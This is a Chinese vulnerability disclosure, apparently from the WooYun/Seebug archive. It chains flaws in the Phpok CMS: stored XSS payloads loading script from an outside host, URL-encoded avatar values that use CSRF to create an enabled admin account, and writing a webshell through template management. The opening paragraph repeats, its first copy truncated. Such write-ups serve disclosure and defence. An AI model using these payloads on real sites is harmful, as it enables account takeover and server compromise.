### 简要描述: Phpok漏洞礼包,组合可shell ### 详细说明: 1.2处存储行xss 2.添加管理员帐号密码+利用点 3.后台写shell 1. 第一处 我们先来注册一个帐号。 [<img src="https://images.seebug.org/upload/201409/22233205fbf9b598f3bccc2e7224289048fcce2f.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233205fbf9b598f3bccc2e7224289048fcce2f.png) 其中帐号这内容为 `a');document.write('<script/src=//t.cn/XXXXXXX></script>')//` 注册好之后。 后台 [<img src="https://images.seebug.org/upload/201409/22233913788388ad877103716ca132a473b82392.png" alt="图片17.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233913788388ad877103716ca132a473b82392.png) [<img src="https://images.seebug.org/upload/201409/222332423b825e9f3751ea79c3a3955dabd61c8d.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222332423b825e9f3751ea79c3a3955dabd61c8d.png) 需要点击才能激活xss [<img...
### 简要描述: Phpok漏洞礼包,组合可shell ### 详细说明: 1.2处存储行xss 2.添加管理员帐号密码+利用点 3.后台写shell 1. 第一处 我们先来注册一个帐号。 [<img src="https://images.seebug.org/upload/201409/22233205fbf9b598f3bccc2e7224289048fcce2f.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233205fbf9b598f3bccc2e7224289048fcce2f.png) 其中帐号这内容为 `a');document.write('<script/src=//t.cn/XXXXXXX></script>')//` 注册好之后。 后台 [<img src="https://images.seebug.org/upload/201409/22233913788388ad877103716ca132a473b82392.png" alt="图片17.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233913788388ad877103716ca132a473b82392.png) [<img src="https://images.seebug.org/upload/201409/222332423b825e9f3751ea79c3a3955dabd61c8d.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222332423b825e9f3751ea79c3a3955dabd61c8d.png) 需要点击才能激活xss [<img src="https://images.seebug.org/upload/201409/222332487f3786bbc664409a7fdb0aac3d622753.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222332487f3786bbc664409a7fdb0aac3d622753.png) 第二处 留言 [<img src="https://images.seebug.org/upload/201409/222333133155f37fdd1a49ba53b4ea3605355cb4.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222333133155f37fdd1a49ba53b4ea3605355cb4.png) 留言主题 `a');document.write('<script/src=//t.cn/XXXXX></script>')//` [<img src="https://images.seebug.org/upload/201409/22233337d2cbf53e8081cf79ee3ed1de278cd06e.png" alt="图片6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233337d2cbf53e8081cf79ee3ed1de278cd06e.png) [<img src="https://images.seebug.org/upload/201409/2223334591acd2d3bbace3695e2a1d6d84e5ce2f.png" alt="图片7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2223334591acd2d3bbace3695e2a1d6d84e5ce2f.png) 同样需要点击 [<img src="https://images.seebug.org/upload/201409/222333501e96b4ffecd0d40c381b10b8ea144ff7.png" alt="图片8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222333501e96b4ffecd0d40c381b10b8ea144ff7.png) 2. 添加管理员帐号+利用点 后台添加管理员帐号处,可以csrf。 而且前台头像的地址没有进行效验。 http://localhost/index.php?c=usercp&f=info 单击修改资料 然后抓包 Post的avatar值修改为 `admin.php%3Fc%3Dadmin%26f%3Dsave%26id%3D%26account%3Dwooyun%26pass%3Da123456%26email%3Da123456%26status%3D0%26if_system%3D1` 图中的值为url解码的内容 [<img src="https://images.seebug.org/upload/201409/222334303f1b905f4fe4948643e9541e15797314.png" alt="图片9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222334303f1b905f4fe4948643e9541e15797314.png) 然后再注册一个帐号 上传头像 Post的avatar修改为 `admin.php%3Fc%3Dadmin%26f%3Dstatus%26id%3D2` 等管理员后台查看的时候会自动生成一个管理员 而且状态为可用 [<img src="https://images.seebug.org/upload/201409/22233450089cdc9f64e5b968b3122ecf8ccb437b.png" alt="图片10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233450089cdc9f64e5b968b3122ecf8ccb437b.png) 然后 可以在后台登录 3. 通过前两部可以进入后台 然后 后台写shell 后台 风格管理 然后添加风格 [<img src="https://images.seebug.org/upload/201409/22233514504794e051530cc3a42b88ef79b45e71.png" alt="图片11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233514504794e051530cc3a42b88ef79b45e71.png) 这个地方要注意。文件夹只能是系统存在的文件夹,要不会失败的。 所以写系统默认存在的www文件夹就行。 [<img src="https://images.seebug.org/upload/201409/22233544e96e26a62555030ce886d05cd5bc34c2.png" alt="图片12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233544e96e26a62555030ce886d05cd5bc34c2.png) [<img src="https://images.seebug.org/upload/201409/222335508814488d2e2aa99d9d8dc5c71a0c9db3.png" alt="图片13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222335508814488d2e2aa99d9d8dc5c71a0c9db3.png) [<img src="https://images.seebug.org/upload/201409/2223355636678c8169a924a65549c97321e156a5.png" alt="图片14.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2223355636678c8169a924a65549c97321e156a5.png) 直接写shell /tpl/www/111.php 代码如下 [<img src="https://images.seebug.org/upload/201409/22233615be5d377bb9969098413e2a2676bf7e2d.png" alt="图片15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233615be5d377bb9969098413e2a2676bf7e2d.png) ### 漏洞证明: /tpl/www/111.php 代码如下 [<img src="https://images.seebug.org/upload/201409/22233615be5d377bb9969098413e2a2676bf7e2d.png" alt="图片15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233615be5d377bb9969098413e2a2676bf7e2d.png)